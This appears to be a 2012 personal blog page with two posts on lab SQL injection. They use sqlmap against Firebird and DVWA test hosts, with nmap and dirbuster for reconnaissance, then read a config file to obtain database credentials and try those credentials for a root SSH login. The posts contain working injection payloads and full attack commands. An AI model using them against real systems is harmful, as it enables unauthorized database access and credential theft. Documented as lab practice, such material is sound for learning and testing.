Showing posts with label sqlmap. Show all posts
Showing posts with label sqlmap. Show all posts

Tuesday, July 31, 2012

ignore switch -D on Firebird (SQLMAP)

hi there, i want to share my experience, 
i found an error on 192.168.56.102/index.php?page=beritaDetail&id=103, so i use sqlmap to retrive databases. i type on sqlmap
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbs" few minutes later, i have a problem, that my sqlmap can't retrieve the databases names.
this is the result :
"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=beritaDetail&id=103' AND 6088=6088 AND 'lDMw'='lDMw

    Type: stacked queries
    Title: Firebird stacked queries (heavy query)
    Payload: page=beritaDetail&id=103'; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;--
---

[14:16:45] [INFO] the back-end DBMS is Firebird

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:16:45] [WARNING] on Firebird it is not possible to enumerate databases
[14:16:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.102'

[*] shutting down at 14:16:45
"
i try to read sqlmap user's manual on http://sqlmap.sourceforge.net/doc/README.html sqlmap support to attack this database(firebird),and this is list databases :

  • Firebird: python-kinterbasdb.
  • Microsoft Access: python-pyodbc.
  • Microsoft SQL Server: python-pymssql.
  • MySQL: python-mysqldb.
  • Oracle: python cx_Oracle.
  • PostgreSQL: python-psycopg2.
  • SQLite: python-pysqlite2.
  • Sybase: python-pymssql.
    • but why my sqlmap can retrieve the databases names.

     So, i ask to my friend how to get a solution. and he answer that it's means that sqlmap won't be able to retrieve databases names as everything is going in a single one. and  i just have --tables and i must ignore  switch -D on firebird (also the same on SQLite and MsAccess).

     so i try to ignore -D, likes this :
    "./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbms Firebird --tables" and what i see, i can through this problem, this is the result 
    "web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS: Firebird 2.0
    [14:33:30] [INFO] fetching tables for database: Firebird_masterdb
    [14:33:30] [INFO] fetching number of tables for database 'Firebird_masterdb'"
    Posted by at 0 comments
    Labels: , , ,

    Tuesday, April 24, 2012

    simple attack vector with Sqlmap --file-read, Dirbuster, and Nmap

    hello guys, now i want to share hacking web in another attack vector.
    i have a victim in address 192.168.56.101. i want to look the service has run, so i use nmap,
    root@archaveliano:/home/localhost# nmap -sV 192.168.56.101

    Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-24 22:58 WIT
    Nmap scan report for 192.168.56.101
    Host is up (0.0016s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu6 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
    3306/tcp open  mysql   MySQL (unauthorized)
    MAC Address: 08:00:27:95:72:2B (Cadmus Computer Systems)
    Service Info: OS: Linux

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
    root@archaveliano:/home/localhost# 


    In there i find a from to input user ID, and try to enter mark " ' " in there. And i find error syntax like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1".

     it's time to work, i opened my sqlmap, and i type this "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 --dbms MySQL --dbs" the information is -u for the URL --cookie for cookie, because this web need to login inside, -p to parameter site vuln, --risk for risk to test the web (max=3) -- level of test the web (max=5), --thread for Max number of concurrent HTTP(s) requests (max=10). --dbms for Force back-end DBMS to this value, and --dbs for Enumerate DBMS databases. 

    it's not a long time to wait, i can retrive the databases like this :
    22:22:06] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [22:22:06] [INFO] fetching database names
    [22:22:06] [INFO] the SQL query used returns 4 entries
    [22:22:06] [INFO] starting 4 threads
    [22:22:06] [INFO] retrieved: information_schema
    [22:22:06] [INFO] retrieved: mysql
    [22:22:06] [INFO] retrieved: fbip
    [22:22:06] [INFO] retrieved: dvwa
    available databases [4]:
    [*] dvwa
    [*] fbip
    [*] information_schema
    [*] mysql

    now i have 4 databases. now i will to take over mysql database. and i enter this on sqlmap "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 -D mysql --tables --dbs"
     but i have a problem, the problem like this 
    [22:15:20] [WARNING] no column(s) found
    [22:25:20] [WARNING] unable to enumerate the columns for table 'user' in database 'mysql'

    i try to find another way, and i remember that sqlmap not only can take over the database, but it can read some file on site, now i will try it. but before i try, i should know, where the file that i need, so i must need dirbuster to find the file.
    file that i need to be on /config/config.inc.php, so on sqlmap, i enter this :
    "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" --file-read "/var/www/config/config.inc.php" -v 1"and i take over web config:
    it will save on web name/files :
    now i know user and password mysql this web, i try to enter the user and password mysql but i find a problem again :
    root@archaveliano:/home/localhost# mysql -h 192.168.56.101 -u root -p
    Enter password: 
    ERROR 1130 (HY000): Host '192.168.56.1' is not allowed to connect to this MySQL server

    i try to enter ssh, because sometimes people get used to make the same password.
    root@archaveliano:/home/localhost# ssh -l root 192.168.56.101

    and this is the result :

    it's very simple, right?!






    Posted by at 0 comments
    Labels: , , , , ,
    Subscribe to: Posts (Atom)